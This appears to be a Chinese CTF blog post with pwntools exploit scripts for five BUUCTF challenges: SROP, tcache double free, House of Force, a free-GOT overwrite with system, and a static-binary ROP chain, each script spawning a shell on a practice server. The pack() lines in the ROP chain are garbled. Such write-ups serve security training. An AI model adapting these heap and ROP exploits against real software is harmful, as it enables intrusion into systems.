BUUCTF SROP UAF House of Force 修改free_got为system 静态链接

ciscn_2019_es_7 ciscn_2019_es_1 hitcontraining_bamboobox hitcontraining_heapcreator picoctf_2018_can_you_gets_me

ciscn_2019_es_7

贴张表：

ip是接下去要干的，sp是这里干完接下来要干的地址（大概XD）
怎么找binsh看我之前这篇：

https://blog.csdn.net/carol2358/article/details/105643009
rsi

当然直接调试找也是可以的

exp：

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_2019_es_7'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26293)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

gadget_sigreturn = 0x4004DA
gadget_system = 0x4004E2
read = 0x4004F1
syscall_ret = 0x400517

p1 = '/bin/sh\x00' + '\x00'*8 + p64(read)
sl(p1)
stack_addr = uu64(ru('\x7f')[-6:])
info_addr('stack_addr', stack_addr)
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr - 0x118
sigframe.rsi = 0
sigframe.rdx = 0
#sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
p2 = '/bin/sh\x00' + '\x00'*8 + p64(gadget_sigreturn) + p64(syscall_ret) + str(sigframe)
sl(p2)

r.interactive()

- ciscn_2019_es_1

tcache最大0x408
做这题的时候脑溢血，填完tcache才发现不用填，然后后面就一系列脑溢血操作，把bin破坏了，还忘了这题是买一送一型，直接没法add orz，多谢小可爱师傅教我
没什么要说的，注意最后改的是tcache里的fd，别再脑溢血去改unsorted里的了

exp：

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_2019_es_1'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28463)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def add(size, content, call):
    sla('choice:', '1')
    sla('Please input the size of compary\'s name\n', str(size))
    sea('please input name:\n', content) 
    sea('please input compary call:\n', str(call))

def show(index):
    sla('choice:', '2')
    sla('index:\n', str(index))

def free(index):
    sla('choice:', '3')
    sla('index:\n', str(index))

add(0x410, 'aaaa', 1)#0
add(0x28, 'bbbb', 1)#1
add(0x410, 'cccc', 1)#2
add(0x18, '/bin/sh\x00', 1)#3
free(0)
show(0)
main_arena = uu64(ru('\x7f')[-6:])
info_addr('main_arena', main_arena)
libc_base = main_arena - 96 -0x10 - libc.sym['__malloc_hook']
info_addr('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
og = libc_base + 0x4f322

free(1)
free(1)
add(0x28, p64(free_hook), 1)#4
add(0x28, 'aaaa', 1)#5
add(0x28, p64(og), 1)#5
free(5)
#debug()
#sl('1')
r.interactive()

hitcontraining_bamboobox

House of Force
条件：
能够以溢出等方式控制到 top chunk 的 size 域
能够自由地控制堆分配尺寸的大小

exp：

from pwn import *
from LibcSearcher import * 

local_file  = './bamboobox'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25604)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sla('Your choice:', str(choice))

def show():
    menu(1)

def add(size, content):
    menu(2)
    sea('Please enter the length of item name:', str(size))
    sea('Please enter the name of item:', content)

def edit(index, size, content):
    menu(3)
    sea('Please enter the index of item:', str(index))
    sea('Please enter the length of item name:', str(size))
    sea('Please enter the new name of the item:', content)

def free(index):
    menu(4)
    sea('Please enter the index of item:', str(index))

magic = 0x400D49
add(0x40, 'aaaa')#0
edit(0, 0x50, 'a'*0x40+p64(0)+p64(0xFFFFFFFFFFFFFFFF))

offset_heap_base = -(0x50+0x20)
malloc_size = offset_heap_base - 0x8 - 0xf

add(malloc_size, 'aaaa')
add(0x10, p64(magic)*2)

#debug()
#sl('1')


r.interactive()

当然也可以不用后门
exp：

from pwn import *
from LibcSearcher import * 

local_file  = './bamboobox'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25604)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sla('Your choice:', str(choice))

def show():
    menu(1)

def add(size, content):
    menu(2)
    sea('Please enter the length of item name:', str(size))
    sea('Please enter the name of item:', content)

def edit(index, size, content):
    menu(3)
    sea('Please enter the index of item:', str(index))
    sea('Please enter the length of item name:', str(size))
    sea('Please enter the new name of the item:', content)

def free(index):
    menu(4)
    sea('Please enter the index of item:', str(index))

add(0x18, 'aaaa')#0
add(0x10, 'bbbb')#1
add(0x68, 'cccc')#2
add(0x10, 'dddd')#3

edit(0, 0x20, 'a'*0x10+p64(0)+p64(0x91))
free(1)
add(0x10, 'eeee')#1
show()
main_arena = uu64(ru('\x7f')[-6:]) - 88
info_addr('main_arena', main_arena)
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
info_addr('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc_hook = libc_base + libc.sym['__libc_realloc']
og = libc_base + 0x4526a

free(2)
edit(1, 0x28, 'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add(0x68, 'aaaa')#2
add(0x68, 'aaaa')#4
edit(4, 0x1b, 'a'*0xb+p64(og)+p64(realloc_hook+0xa))

#add(0x10, 'aaaa')
#debug()
#sl('1')


r.interactive()

hitcontraining_heapcreator

本题将free的got修改为system
第一次edit后free，第二个chunk的node和本体已经互换，之后要注意content的指针，content指针指向的才是content的内容，所以可以修改free为system
exp：

from pwn import *
from LibcSearcher import * 

local_file  = './heapcreator'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25955)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(choice):
    sea('Your choice :', str(choice))
def add(size, content):
    menu(1)
    sea('Size of Heap : ', str(size))
    sea('Content of heap:', content)
def edit(index, content):
    menu(2)
    sea('Index :', str(index))
    sea('Content of heap : ', content)
def show(index):
    menu(3)
    sea('Index :', str(index))
def free(index):
    menu(4)
    sea('Index :', str(index))

add(0x18, 'a')
add(0x10, 'a')
edit(0, '/bin/sh\x00'+p64(0)*2+p8(0x41))
free(1)
add(0x30, 'a'*0x20+p64(0x30)+p64(elf.got['free']))
show(1)
sys_addr = uu64(ru('\x7f')[-6:]) - libc.sym['free'] + libc.sym['system']
edit(1, p64(sys_addr))
free(0)

r.interactive()

picoctf_2018_can_you_gets_me

静态编译，随便写写
直接 ROPgadget --binary picoctf_2018_can_you_gets_me --ropchain
exp头部加from struct import pack
exp：

from pwn import *
from LibcSearcher import * 
from struct import pack
local_file  = './PicoCTF_2018_can-you-gets-me'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25369)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def pwn():
	p = 'a'*0x18+'bbbb'
	p += pack(', 0x0806f02a) # pop edx ; ret
	p += pack(', 0x080ea060) # @ .data
	p += pack(', 0x080b81c6) # pop eax ; ret
	p += '/bin'
	p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack(', 0x0806f02a) # pop edx ; ret
	p += pack(', 0x080ea064) # @ .data + 4
	p += pack(', 0x080b81c6) # pop eax ; ret
	p += '//sh'
	p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack(', 0x0806f02a) # pop edx ; ret
	p += pack(', 0x080ea068) # @ .data + 8
	p += pack(', 0x08049303) # xor eax, eax ; ret
	p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack(', 0x080481c9) # pop ebx ; ret
	p += pack(', 0x080ea060) # @ .data
	p += pack(', 0x080de955) # pop ecx ; ret
	p += pack(', 0x080ea068) # @ .data + 8
	p += pack(', 0x0806f02a) # pop edx ; ret
	p += pack(', 0x080ea068) # @ .data + 8
	p += pack(', 0x08049303) # xor eax, eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0807a86f) # inc eax ; ret
	p += pack(', 0x0806cc25) # int 0x80
        return p

p = pwn()
se(p)

r.interactive()